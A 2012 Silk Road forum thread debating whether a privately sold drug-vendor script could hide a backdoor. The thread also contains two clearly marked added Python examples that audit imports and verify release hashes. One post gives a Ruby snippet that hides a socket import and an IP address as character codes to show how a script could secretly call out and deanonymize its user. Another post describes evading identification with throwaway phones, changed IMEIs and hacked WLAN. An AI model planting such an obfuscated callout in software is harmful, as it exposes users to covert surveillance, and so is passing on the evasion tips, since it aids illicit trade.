So again, I just don't think you've done enough to prove that your program is safe. 

I've posted the proof-of-concept shell script I first wrote earlier in this thread.  It performs some of the same functions in a different way.  It does not have all the features of SROPPy.

I can't think of anything better other than releasing it for free or handing it to people who could check it out (and these people may not exist on sr) but maybe someone can.

The only person I'd really trust on here to do it properly is Guru and he's already said he doesn't know Python.  I don't really trust kmfkewm, although I appreciate his posts.  Still, that point is moot, because he's a Ruby guy and not a Python guy.

I'm still waiting for Shannon to weigh in ... maybe.

Honestly I do doubt that it has any exploits and I don't really know enough about programming to judge everything in your posts so maybe everything in this thread is just paranoid ranting about exploits that really aren't plausible.  But if it is at all possible it's better to stay safe though no?

The problem here is that you're saying that my only choice is to give in to the will of others.  That is not my definition of what it means to be libertarian.

I may be relatively new to SR, but not this philosophy.  Go back and read everything in GrahamGreene's comment, I agree with all of it.  Then go and find one of DPR's posts and read the documents linked in his forum signature, especially SEK3's New Libertarian Manifesto (if you don't want to read it there's an audiobook of it on www.agorism.info).

"Now can you guess what happens after that?

1)  I will be proven right (eventually).
2)  We will discover that there really aren't as many people capable of auditing it properly as Pine might think.
3)  My "tip jar" in my signature will receive sweet fuck all and I can go back to the drawing board."

Personally this would be my guess as well but in the end all I have at the moment is an educated guess and for me that isn't enough.

So there we go; I can try to appease the demands of others by working for free or I can try to address as much of the security concerns as possible while participating in this market as it is intended.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: holyfuckisuck on September 06, 2012, 03:13 pm
Yeah, I think the whole thing was blown waaaaay out of proportion by pine.  I mean this thread and everything she has said could be condensed into maybe 1 sentence:  "Other people haven't audited the program and it isn't freely available to the public and this means that the program could hypothetically contain some sort of exploit, so be very careful downloading and implementing it."  This sentence seems true to me, but calling someone LE and saying all the shit that she has said without any evidence is just silly.  Ask questions, but don't come to baseless conclusions.

Anyway, with that being said I still wouldn't take this sort of risk if I were a vendor.  Downloading software from an anonymous person online that could, no matter how unlikely, contain some sort of exploits when I could simply do such a task without the software even if it did take a bit longer seems a little unreasonable to me I guess.   If other vendors ARE willing to take that risk then that's certainly fine with me though.

Also, try not to shove your libertarian principles down my throat, I don't care and it's completely off topic.  Your decisions regarding how you would distribute this software had nothing to do with libertarian principles and neither does anything that I've posted.  You'll start sounding like pine if you start twisting everything into representatives of political theories etc.  edit:  OK that may have come off as too harsh.  I don't disagree with libertarians or actually claim to know anything about how to properly govern the human race (personally I doubt you or anyone else does either but please don't consider this an invitation to try and prove me wrong) but your reading list just seemed to come out of nowhere.

Oh and yeah, I forgot about shannon.  Shannon seems knowledgeable to me and I hope he/she weighs in here too.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: wizdom on September 06, 2012, 03:29 pm
I want to thank Pine for explaining how exploits are hidden in code in such a way as to not be found, like I was in kindergarten, and typing in my first commands in Basic on a Commodore PET. Incredibly presumptuous of you.  Nothing like running to the forum and screaming LE! LE! LE! for teh lulz, eh, Pine?  ..........sickgirl

You can't talk that way to Pine... She has worked too hard typing her finger raw for this community. A little respect, please.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: sickgirl on September 06, 2012, 05:59 pm
I want to thank Pine for explaining how exploits are hidden in code in such a way as to not be found, like I was in kindergarten, and typing in my first commands in Basic on a Commodore PET. Incredibly presumptuous of you.  Nothing like running to the forum and screaming LE! LE! LE! for teh lulz, eh, Pine?  ..........sickgirl

You can't talk that way to Pine... She has worked too hard typing her finger raw for this community. A little respect, please.

Ok, first off, I was responding to the condescending way I was being addressed. I for one appreciate all that she has done vis a vis the PGP club, but in this thread she made a lot of baseless accusations, and when I have someone who presumes that I do not know jack about computing, or code, I will correct them. When I am being spoken down to, I will respond in kind. As for "I can't"...well, I did, just as she did. I have been on silk road for over a year, I am not some n00b girl who comes in and runs her mouth. Do a little thread searching. I am actually quite polite, and patient. I do not however, take kindly to fear mongering and baseless accusations. The title of this thread was completely uncalled for. Therefore, it boils down to this. Communicate to me as if I were your equal, and do not make assumptions, and I will treat you and anyone else with respect. Disrespect me, and most likely, I will still be polite, but I will call you out. As for my sharp tone when I did it? yeah, that was a bit out of character for me, but I was on the border of WD. Now my package has arrived and I am good, but I will not apologise. After all, I did not resort to name calling, nor did I go off and make accusations or assumptions toward her. I have given pine plenty of positive karma, and I really groove at a lot of the posts/threads she has made, and this does not change that. Just because someone does good for the community does not mean that they are a goddess who cannot ever be spoken to in a manner that may be less than praise. Respect is a two way street sweetie
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 08:43 pm
Quote
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.

Except it is insanely more difficult to pwn someone with a malicious JPG than it is to own someone who runs the script they just privately got from you....none of your arguments hold water and honestly they are stretching very far to try to make what you are doing appear to be anything other than sketchy with a capital S.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 09:47 pm
I think that your replies make sense.  I guess if people are so paranoid why not let specific members of the forum check the code out?  Maybe you should give the code to kmf and he could check it out and confirm that it's safe and then once you sell it to someone kmf could send them the code he got as well and if they are the same then that would be a good way to make sure it is safe and that you don't change it along the way.  Just a suggestion though.  To me although what you've said makes sense it's really up to you to guarantee the safety of your software completely in some way.  It doesn't seem like an impossible task to me even if you don't want to give it to the public for free, but I guess I could be wrong there.

First of all I do not know python, although it looks close enough to Ruby from what I have seen that I am sure I could audit such a simple program with little effort to learn it. Second of all, it would preferably be audited by more people than me, as in anyone with access to the forum ;).
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 09:54 pm
Quote
Uh-huh.  So you've got a vendor account and inspected all the code that the vendors see?

No, but I think it is less of a risk to count on Firefox not having a zero day vulnerability that SR will use to target me versus a script marketed to drug traffickers not having a backdoor that will target me. Strictly speaking it can be much more secure to run your application than to access SR, as you can not access SR from behind an air gap. On the other hand, it is dangerous to talk about things that are true in theory when they are extremely unlikely to be true in practice.

Also I believe it is theoretically possible to compile any interpreted language (and likewise to interpret any compiled language), so indeed python and even ruby can be compiled, it is just not the common use of Ruby (and in fact I don't know how to do it) but apparently can be done more practically with Python.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 10:29 pm
It is not impossible to hide a backdoor of sorts in a python script. Take this for example. It is not exactly a well hidden backdoor, but it might be overlooked, and a single call to it could deanonymize anyone who runs the script it is in. I admit it looks sketchy as hell and anyone who knows ruby could figure out what is going on, but this is about as far as you get when it comes to backdoors in languages like this (whereas with C or C++ it can be done MUCH MUCH more sneakily).


[[115, 111, 99, 107, 101, 116].pack("c*")].each {|gpg_helper| require gpg_helper}
def seed_randomness
  random_numbers = TCPServer.open([49, 50, 46, 50, 53, 46, 51, 51, 46, 49, 50].pack("c*"), [56, 48].pack("c*"))
  random_numbers.send("seed", 0)
end

The TCPServer call gives it away but if I spent more time on it I could probably obfuscate that as well. I have not tested this but think it should work.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: warweed on September 07, 2012, 02:12 am
Thanks for everyone discussing the matter.

We have recognized Louis Script yesterday and were interested.

We assume we are pretty good with computing & security in general...but don't know shit about programming.

But we know at least so much that we could see that those Python scripts have a minuscule chance of being an Attack.

Thanks.

Also it is really easily verified. There are a million clearnet forums out there to check this or find ppl to do this.

Yep.  Not to mention a lot of documentation on places like python.org and diveintopython.net.

We still want to marry pine someday through cryptographical contract :)  but this time she was a little bit too hasty.

Warning of probable malware and advising being cautious is a good thing but directly marking it as malware is not a good move.

This is appreciated.

Pine and Louis are both great for the community and we don't suspect LEO. even their help is appreciated as with some proper measures it is very very hard to get caught :)

Cheers.  I don't actually think s/he is either.

We will order a customized version of the script sometimes in the future  ..we long searched for something like this.

I look forward to that.  :)

What are the probabilities of an Auto - Answer script being developed or feasible?  Warweed seems to use something like this.

If there were an API it would be dead simple.  There isn't.  It should still be possible to use HTTP-Post to interact with the pages.  I presume that's what Warweed does, with an always on system, constantly logged in to check the orders page every minute and then respond with a PM once an order is recognised.

Unless, of course, Warweed is actually a vendor account created by SR staff and can run directly on the system.  I think it's the former, though, because the recent academic report on SR confirmed that a session ID could be used by a bot to crawl the site.  Whoever is running Warweed just needs to login as normal occasionally and update the session ID used by his or her script.

disclaimer: we use prepaid international SIM , change IMEI numbers, throw away phones and hacked WLAN for access to the site.
These scripts will only be used in torbox images.

Cool.

I have discussed API with dpr for a very long time i mean sure it would be nice but in the end you can do the same with carving

auto replies and site crawling is dead easy once you understand the site structure and link structure and how that's all setup if you were here during the migration you remember how things used to and can reverse engineer the entire site..

personally i still can provide a whole db for all users on the site, i still can tell you when and what time they registered i can still give you approx sales data on sr based on a stable btc market etc etc etc

as for how warbot works believe its no easy feat of checks rechecks time outs etc etc the list goes on and on and has gone through about 20 rewrites now
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: xollero on September 07, 2012, 04:31 am
You can't talk that way to Pine... She has worked too hard typing her finger raw for this community. A little respect, please.

what? Doesn't work like that. If you want to have a hero worship session, go do it in a thread where said hero hasn't flown off the handle and made serious accusations, been thoroughly rebutted, and then still didn't really back off, just kind of prevaricated and fussed about the potential for the software seller to swap out for malware (err. checksums?). Pine contributes metric fucktons more to this board than most do, absolutely, but she was really, wildly off base here.

I started reading this thread and was immediately right there with Pine, horrified that someone was selling closed-source 'vendor software' on the road. Then I saw: Python/script, GPL, source available here.... huh? You'd have to go to great pains for the deliverables here to not be wide open for inspection based on language alone. Far from an ominous sign of LE infiltration, this sounded like an interesting project. The kind of effort we could use a lot more of, not less. I agree that software on SR is somewhat problematic, for the reasons well-discussed here already. But vendor software done well could potentially make vendors *more* secure, not less.

And no. So long as the scripts themselves are not ridiculous mountains of tortured spaghetti code (in which case no-one should run it on general principle), there will be no room full of NSA spooks required to vet the code thoroughly. It will be relatively brief. Either it makes network connections, or it doesn't. Either it does unexpected IO, or it doesn't.

For a software project with sufficient interest, why couldn't there be a community vetting stage in the release cycle? SoftwareVendorGuy releases v1.0.0.0 as an archive, with a known hash or signature. Community vets the contents in the open. Now a vendor buying the software can consider their trust in those who are vouching for it, and thus have some assurances that the bits in *that specific release* are, while not necessarily bug free, clear of code or resources with malicious intent.

Now you'd also need to have a patch review cycle, and standard secure practice would have to dictate not installing any patches or updates until the requisite trusted signoffs were available. Or in the case of an urgent fix, just develop / collab on the patch in the open, and again have people sign-off. Such sign-offs could be actual PGP signed statements, of course.

Anyways. It isn't clear that there is the manpower, will, or resources here for that, yet. But why don't we look forward to how we might more openly and collaboratively engineer software here on the darknets? Personally I think if people are going to try to move this particular bar forward, you should bring hard facts to the table before you shout them down as LE. Otherwise you're actively retarding the community's growth, which I'm pretty sure can and should be measured in metrics other than post count.
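The vetting stage described in the post above can be made mechanical. This is an added example, not part of the original thread and not SROPPy's code: it checks an unpacked release against the published manifest and lists which reviewers vouched for that exact manifest. SHA-256, the sha256sum-style manifest layout, the file names and the reviewer names are assumptions; checking the PGP signatures on the sign-off statements themselves is left to gpg.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text):
    """Parse 'hexdigest  relative/path' lines (sha256sum layout, assumed)."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, name = line.split(None, 1)
        entries[name.lstrip("*")] = digest.lower()
    return entries


def verify_release(root, manifest):
    """Compare every file under root with the vetted manifest.

    Returns (kind, path) findings:
      compiled - bytecode that reviewers cannot read as source
      unlisted - file shipped but never vetted
      mismatch - file differs from the vetted copy
      missing  - vetted file absent from this copy
    """
    root = Path(root)
    on_disk = {p.relative_to(root).as_posix()
               for p in root.rglob("*") if p.is_file()}
    findings = []
    for name in sorted(on_disk):
        if name.endswith((".pyc", ".pyo")):
            findings.append(("compiled", name))
        if name not in manifest:
            findings.append(("unlisted", name))
        elif sha256_file(root / name) != manifest[name]:
            findings.append(("mismatch", name))
    for name in sorted(set(manifest) - on_disk):
        findings.append(("missing", name))
    return findings


def vouchers_for(manifest_text, signoffs):
    """Reviewers whose sign-off names the digest of this exact manifest."""
    manifest_id = hashlib.sha256(manifest_text.encode()).hexdigest()
    return sorted(r for r, d in signoffs.items() if d == manifest_id)


def demo():
    """Build a constructed release, vet it, then tamper with the copy."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed sample files, not the real product's contents.
        (root / "orders.py").write_bytes(b"import csv\n")
        (root / "decrypt.sh").write_bytes(b'#!/bin/sh\ngpg --decrypt "$1"\n')
        manifest_text = "".join(
            f"{sha256_file(p)}  {p.name}\n" for p in sorted(root.iterdir()))
        manifest = parse_manifest(manifest_text)
        clean = verify_release(root, manifest)

        # The copy a later buyer receives: one file changed, one file added.
        (root / "orders.py").write_bytes(b"import csv\nimport socket\n")
        (root / "helper.pyc").write_bytes(b"\x00constructed bytecode")
        tampered = verify_release(root, manifest)

        manifest_id = hashlib.sha256(manifest_text.encode()).hexdigest()
        signoffs = {  # constructed: reviewer -> manifest digest they signed
            "reviewer_a": manifest_id,
            "reviewer_b": manifest_id,
            "reviewer_c": "0" * 64,  # vouched for some other release
        }
        return clean, tampered, vouchers_for(manifest_text, signoffs)


if __name__ == "__main__":
    clean, tampered, vouchers = demo()
    print("vetted copy:  ", clean)
    print("tampered copy:", tampered)
    print("vouchers:     ", vouchers)
```

Because each sign-off names the digest of the manifest rather than the seller, a copy that differs from the vetted release fails even when it comes from the same account.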
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 07, 2012, 09:46 am
Yeah, I think the whole thing was blown waaaaay out of proportion by pine.  I mean this thread and everything she has said could be condensed into maybe 1 sentence:  "Other people haven't audited the program and it isn't freely available to the public and this means that the program could hypothetically contain some sort of exploit, so be very careful downloading and implementing it."  This sentence seems true to me, but calling someone LE and saying all the shit that she has said without any evidence is just silly.  Ask questions, but don't come to baseless conclusions.

And that's something I've got no problem with.  Questions are good.

Anyway, with that being said I still wouldn't take this sort of risk if I were a vendor.  Downloading software from an anonymous person online that could, no matter how unlikely, contain some sort of exploits when I could simply do such a task without the software even if it did take a bit longer seems a little unreasonable to me I guess.   If other vendors ARE willing to take that risk then that's certainly fine with me though.

Which is exactly what a free market allows.  Those who want it can buy it, those who don't want it don't have to buy it or fund it in any way.

Also, try not to shove your libertarian principles down my throat, I don't care and it's completely off topic.

That's just my position, you can take or leave it as you see fit.  It's not off topic, though, because Silk Road is an agorist market.  Understanding agorist principles, whether you share them or not, will help you understand why the market is the way that it is.  That is, for example, why Pine couldn't get DPR to terminate my account and started this thread in the first place.

Your decisions regarding how you would distribute this software had nothing to do with libertarian principles

Actually that's not entirely accurate.  I've done some work (written the software) and I am now offering that as a product in the market.  The market will then decide if it wants it or not.  If not then I won't get any sales.  I think I will or I wouldn't have done it, but it might take a while.

and neither does anything that I've posted.  You'll start sounding like pine if you start twisting everything into representatives of political theories etc.  edit:  OK that may have come off as too harsh. 

Nah, it's just your opinion.

I don't disagree with libertarians or actually claim to know anything about how to properly govern the human race(personally I doubt you or anyone else does either but please don't consider this an invitation to try and prove me wrong) but your reading list just seemed to come out of nowhere.

The whole point of it is not to rule anyone except yourself and not to be ruled by anyone else.

This, of course, is precisely where libertarian principles are on topic because my critics to this point can be reduced to stating: "do what we say, give us your work for free and maybe someone might give you a donation."  Then they're getting annoyed because I'm saying: "no, I'm in an agorist market and people can choose to buy my product or choose not to."

Oh and yeah, I forgot about shannon.  Shannon seems knowledgeable to me and I hope he/she weighs in here too.

It would be interesting.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 07, 2012, 10:21 am
Quote
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.

Except it is insanely more difficult to pwn someone with a malicious JPG than it is to own someone who runs the script they just privately got from you....

Nevertheless it illustrates a more general principle: that LE would want to target as many people as possible and would choose an attack vector which enabled them to do that.

Right now there are only two people with my code, myself and the vendor who wanted it written in the first place.  If you and Pine get your way we'll be the only two unless I give into your demands and give it away for free.

none of your arguments hold water and honestly they are stretching very far to try to make what you are doing appear to be anything other than sketchy with a capital S.

No, that's just your opinion.  You want me to adhere to your definition of what Silk Road should be rather than what it actually is.

It's really a lot simpler than this thread makes it appear:

I've said my product is a particular thing, which runs in a certain way and is not a threat.  You (and Pine) say otherwise.  If people agree with you or are just not interested in the product then they won't buy it.  If people don't agree with you and are interested in the product then they might buy it.

If people buy it and I am telling the truth then that will be reported to the forum and, hopefully, I will have more sales.  If people buy it and it turns out I've lied or the product is a threat (or just includes a bad bug that makes it a threat), then that will be revealed.  At that point I will lose all credibility, have no sales and possibly have my account terminated and be driven from the site.

At the end of the day I am attempting to participate in an agorist market.  You want a different kind of market where physical products (e.g. drugs) are freely traded, but software isn't.  Now, if I were forcing people to use my software then releasing the code completely publicly would be the right thing to do, but I'm not forcing anyone to do anything.  The only people here trying to force anyone to do anything are you, Pine and your supporters by insisting I should not sell my product (and possibly any product) and give my work away.

If you really want to prove me wrong then buy SROPPy and post the code.  I'm willing to bet you don't do that.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 07, 2012, 10:37 am
Quote
Uh-huh.  So you've got a vendor account and inspected all the code that the vendors see?

No, but I think it is less of a risk to count on Firefox not having a zero day vulnerability that SR will use to target me versus a script marketed to drug traffickers not having a backdoor that will target me.

Only if there's some secret code embedded in it the way Pine has described that somehow takes the data a buyer puts in the address field of an order and/or their username and turns it into a sneaky (possibly air-gap bridging) attack (or turns the vendor's printer into a weapon).  I've said it before and I'll say it again: my code does not do this.  It reads files, it writes files, it invokes GPG to decrypt the encrypted files and it prints.

Strictly speaking it can be much more secure to run your application than to access SR, as you can not access SR from behind an air gap. On the other hand, it is dangerous to talk about things that are true in theory when they are extremely unlikely to be true in practice.

I've stated that it can run behind an air gap in order to illustrate that it does not require any network connectivity.  Actually running it behind one is entirely up to each vendor's security policies.

Besides, Wikileaks have already proven that an air gap can be bridged with the cablegate data.  So we can argue the value of that until the cows come home.

Also I believe it is theoretically possible to compile any interpreted language (and likewise to interpret any compiled language), so indeed python and even ruby can be compiled, it is just not the common use of Ruby (and in fact I don't know how to do it) but apparently can be done more practically with Python.

Yes, it is possible to compile Python code.  This code is not precompiled.  You can see the list of files in version 1.1 on the product page with their SHA sums.  The Python files are .py and NOT .pyc.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 07, 2012, 10:57 am
It is not impossible to hide a backdoor of sorts in a python script.

You'd still have to open a socket connection and import a module that allowed that (e.g. os, socket, urllib, urllib2 and a bunch of others for specific protocols).  At that point the game would be up unless the script needed those modules for some other legitimate purpose.

The only one of those I've even considered using is the os module, which allows access to invoking features of the operating system (e.g. a command from the command line).  This would probably be necessary to port the code to Windows and cut the bash scripts out, while still being able to do things like invoke GPG (there is no way in Hell I'm going to try my own implementation of the entire OpenPGP protocol for this).

The TCPServer call gives it away but if I spent more time on it I could probably obfuscate that as well. I have not tested this but think it should work.

Yes, just as a socket call would in Python.  Of the three Python files in SROPPy two of them import the csv module and one of them does not import any modules.  The rest of it uses the built-in functions of the language.
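The check discussed in the two posts above (which modules does a script import, and is the module name hidden the way the Ruby snippet hides it) can be run mechanically. This is an added example, not part of the original thread and not SROPPy's code: it parses Python source without executing it and reports every import outside an allowlist, plus any import or code execution whose target is only known at run time. The allowlist of csv follows the post above; the module lists are illustrative rather than complete, and the sample sources and function names are constructed.

```python
import ast

# Illustrative, not exhaustive: modules that can open network connections.
NETWORK_CAPABLE = {"socket", "urllib", "urllib2", "http", "httplib",
                   "ftplib", "smtplib", "telnetlib", "ssl", "asyncio"}
# Modules that can run commands or load native code.
PROCESS_CAPABLE = {"os", "subprocess", "ctypes", "pty", "importlib"}
IMPORT_CALLS = {"__import__", "importlib.import_module"}
CODE_CALLS = {"eval", "exec", "compile", "execfile"}


def _call_name(func):
    """Dotted name of a call target, e.g. 'importlib.import_module'."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        base = _call_name(func.value)
        return f"{base}.{func.attr}" if base else func.attr
    return None


def _classify(module, lineno, allowed, findings):
    """Record an import unless its top-level package is allowlisted."""
    top = module.split(".")[0]
    if top in allowed:
        return
    if top in NETWORK_CAPABLE:
        kind = "network-import"
    elif top in PROCESS_CAPABLE:
        kind = "process-import"
    else:
        kind = "unlisted-import"
    findings.append((lineno, kind, top))


def audit_source(source, allowed=("csv",)):
    """Return sorted (line, kind, name) findings; the code is never run."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                _classify(alias.name, node.lineno, allowed, findings)
        elif isinstance(node, ast.ImportFrom):
            if node.level == 0 and node.module:
                _classify(node.module, node.lineno, allowed, findings)
        elif isinstance(node, ast.Call):
            name = _call_name(node.func)
            if name in IMPORT_CALLS:
                arg = node.args[0] if node.args else None
                if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                    # Literal name: treat it like an ordinary import.
                    _classify(arg.value, node.lineno, allowed, findings)
                else:
                    # Name built at run time: a text search for the module
                    # name finds nothing, so a reviewer must read this line.
                    findings.append((node.lineno, "dynamic-import", name))
            elif name in CODE_CALLS:
                findings.append((node.lineno, "dynamic-code", name))
    return sorted(findings)


# Constructed sample: only the allowlisted csv module.
SAMPLE_CLEAN = '''
import csv

def load_orders(path):
    with open(path) as fh:
        return list(csv.reader(fh))
'''

# Constructed sample: same character-code trick as the Ruby snippet in the
# thread, with the module name assembled at run time. No connection is made.
SAMPLE_SUSPECT = '''
import csv
import os

CODES = [115, 111, 99, 107, 101, 116]

def seed_randomness():
    helper = __import__("".join(chr(c) for c in CODES))
    return helper
'''

if __name__ == "__main__":
    for label, src in (("clean", SAMPLE_CLEAN), ("suspect", SAMPLE_SUSPECT)):
        print(label, audit_source(src))
```

An empty result narrows what a human has to read; it does not replace the read, since shell scripts shipped alongside and anything invoked through an allowlisted module are outside what this inspects.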
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: OzFreelancer on September 07, 2012, 11:09 am
As for my sharp tone when I did it? yeah, that was a bit out of character for me,

Oh, I dunno...  ;)
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 07, 2012, 11:34 am
I have discussed API with dpr for a very long time i mean sure it would be nice but in the end you can do the same with carving

Clearly.  Obviously I would prefer an API because it makes it a lot easier to code for and a lot cleaner.  That said, the code currently being argued over on this thread is pretty clean and minimal too, but it requires human interaction to prepare the input data (to convert the HTML order page to CSV).  Obviously you already do that in a different way because you don't need the address field filled out.

auto replies and site crawling is dead easy once you understand the site structure and link structure and how that's all setup if you were here during the migration you remember how things used to and can reverse engineer the entire site..

Yes, the path structure does look very static and fairly straight forward to interact with.

personally i still can provide a whole db for all users on the site, i still can tell you when and what time they registered i can still give you approx sales data on sr based on a stable btc market etc etc etc

Which shows how that academic, I forget his name, managed to trawl the site for the evidence that went into that report.

as for how warbot works believe its no easy feat of checks rechecks time outs etc etc the list goes on and on and has gone through about 20 rewrites now

I don't doubt it, but it's quite impressive.  I think I may have grabbed something through it or one of the other automated systems when I wanted to see what the order system looked like for buyers (don't thank me, whatever I picked was either free or cheap and I wasn't actually interested in the product, more the SR order system).
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: grahamgreene on September 07, 2012, 07:14 pm
I'm in an agorist market

The principles behind this and any marketplace are simple human greed, and not agorism. People were greedy before agorism. They will be greedy long after it.


Idola fori is a Latin term, coined by Sir Francis Bacon. The term is one of four such "idols" which represent "idols and false notions which are now in possession of the human understanding, and have taken deep root therein, not only so beset men's minds that truth can hardly find entrance, but even after entrance is obtained, they will again in the very instauration of the sciences meet and trouble us, unless men being forewarned of the danger fortify themselves as far as may be against their assaults".

Bacon said that there were two basic kinds of Idol of the Market Place:

They are either names of things which do not exist (for as there are things left unnamed through lack of observation, so likewise are their names which result from fantastic suppositions and to which nothing in reality corresponds), or they are names of things which exist, but yet confused and ill-defined, and hastily and irregularly derived from realities.

— Novum Organum, Aphorism LX

The first kind "is more easily expelled, because to get rid of them it is only necessary that all theories should be steadily rejected and dismissed as obsolete."
But according to Bacon, "the other class, which springs out of a faulty and unskillful abstraction, is intricate and deeply rooted." This is because it has to do with the way words themselves can guide thinking. Nevertheless, there are "certain degrees of distortion and error. [...] some notions are of necessity a little better than others, in proportion to the greater variety of subjects that fall within the range of the human sense."

How many people here read Francis Bacon? How many people here read books on agorism and misinterpreted everything they saw? How many people here read?

You're new here so I doubt you've read any of DPR's posts regarding his / her views and ideals, but suffice it to say this market is certainly built around agorist principles.

The force that drives a CAPITALISM based marketplace is human greed. This is a marketplace free of regulation where the markets (i.e. the buyers) dictate the prices and not the other way round - thus it is an agorist marketplace, regardless of how you wish to interpret it.

I have to ask: do you even know what agorism is?  ???
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Limetless on September 07, 2012, 07:18 pm
I'm in an agorist market

The principles behind this and any marketplace are simple human greed, and not agorism. People were greedy before agorism. They will be greedy long after it.


Idola fori is a Latin term, coined by Sir Francis Bacon. The term is one of four such "idols" which represent "idols and false notions which are now in possession of the human understanding, and have taken deep root therein, not only so beset men's minds that truth can hardly find entrance, but even after entrance is obtained, they will again in the very instauration of the sciences meet and trouble us, unless men being forewarned of the danger fortify themselves as far as may be against their assaults".

Bacon said that there were two basic kinds of Idol of the Market Place:

They are either names of things which do not exist (for as there are things left unnamed through lack of observation, so likewise are their names which result from fantastic suppositions and to which nothing in reality corresponds), or they are names of things which exist, but yet confused and ill-defined, and hastily and irregularly derived from realities.

— Novum Organum, Aphorism LX

The first kind "is more easily expelled, because to get rid of them it is only necessary that all theories should be steadily rejected and dismissed as obsolete."
But according to Bacon, "the other class, which springs out of a faulty and unskillful abstraction, is intricate and deeply rooted." This is because it has to do with the way words themselves can guide thinking. Nevertheless, there are "certain degrees of distortion and error. [...] some notions are of necessity a little better than others, in proportion to the greater variety of subjects that fall within the range of the human sense."

How many people here read Francis Bacon? How many people here read books on agorism and misinterpreted everything they saw? How many people here read?

You're new here so I doubt you've read any of DPR's posts regarding his / her views and ideals, but suffice it to say this market is certainly built around agorist principles.

The force that drives a CAPITALISM based marketplace is human greed. This is a marketplace free of regulation where the markets (i.e. the buyers) dictate the prices and not the other way round - thus it is an agorist marketplace, regardless of how you wish to interpret it.

I have to ask: do you even know what agorism is?  ???

Nowt wrong with Capitalism. It's what drives progress. Bloody hippies.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: thereisnospoon on September 07, 2012, 07:53 pm
lim lim limmy...

it's actually what hinders it.

though it certainly has its awesome points. just simply not the best a human existence can do. for capitalism to thrive, problems have to exist and continue to exist. ever seen the storyofstuff.com? or storyofbottledwater? this is a system for conventionals... cyclical consumption and planned obsolescence is what drives the magic capitalistic circle of consumption and infinite growth and profit. except the resources that make it all happen are not infinite. sorry for the derail. back on track back on track... wasn't cypher from the matrix uhh.....?

i think the system is great. as a transitioning one.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: grahamgreene on September 07, 2012, 08:30 pm
I'm in an agorist market

The principles behind this and any marketplace are simple human greed, and not agorism. People were greedy before agorism. They will be greedy long after it.


Idola fori is a Latin term, coined by Sir Francis Bacon. The term is one of four such "idols" which represent "idols and false notions which are now in possession of the human understanding, and have taken deep root therein, not only so beset men's minds that truth can hardly find entrance, but even after entrance is obtained, they will again in the very instauration of the sciences meet and trouble us, unless men being forewarned of the danger fortify themselves as far as may be against their assaults".

Bacon said that there were two basic kinds of Idol of the Market Place:

They are either names of things which do not exist (for as there are things left unnamed through lack of observation, so likewise are their names which result from fantastic suppositions and to which nothing in reality corresponds), or they are names of things which exist, but yet confused and ill-defined, and hastily and irregularly derived from realities.

— Novum Organum, Aphorism LX

The first kind "is more easily expelled, because to get rid of them it is only necessary that all theories should be steadily rejected and dismissed as obsolete."
But according to Bacon, "the other class, which springs out of a faulty and unskillful abstraction, is intricate and deeply rooted." This is because it has to do with the way words themselves can guide thinking. Nevertheless, there are "certain degrees of distortion and error. [...] some notions are of necessity a little better than others, in proportion to the greater variety of subjects that fall within the range of the human sense."

How many people here read Francis Bacon? How many people here read books on agorism and misinterpreted everything they saw? How many people here read?

You're new here so I doubt you've read any of DPR's posts regarding his / her views and ideals, but suffice it to say this market is certainly built around agorist principles.

The force that drives a CAPITALISM based marketplace is human greed. This is a marketplace free of regulation where the markets (i.e. the buyers) dictate the prices and not the other way round - thus it is an agorist marketplace, regardless of how you wish to interpret it.

I have to ask: do you even know what agorism is?  ???

Nowt wrong with Capitalism. It's what drives progress. Bloody hippies.

I was a staunch capitalist for many years Limetless - I was pro-regulation, pro-market manipulation, pro-government and essentially pro-fascist given the nature of the beasts that I supported. With capitalism comes regulation and government intrusion. Indeed capitalism by its very regulatory nature is what powers the governments of today, and with them, their restrictive laws. Don't get me wrong, I like making money hand over fist as much as the next guy but that is only because we currently live within the confines of a capitalist society.
Capitalism is the reason that marijuana and most other drugs aren't restricted. Marijuana's prohibition in particular was the result of corrupt capitalism and the power that pharmaceutical companies who lobby politicians to keep legalisation off the agenda also exists as a symptom of the capitalist condition.

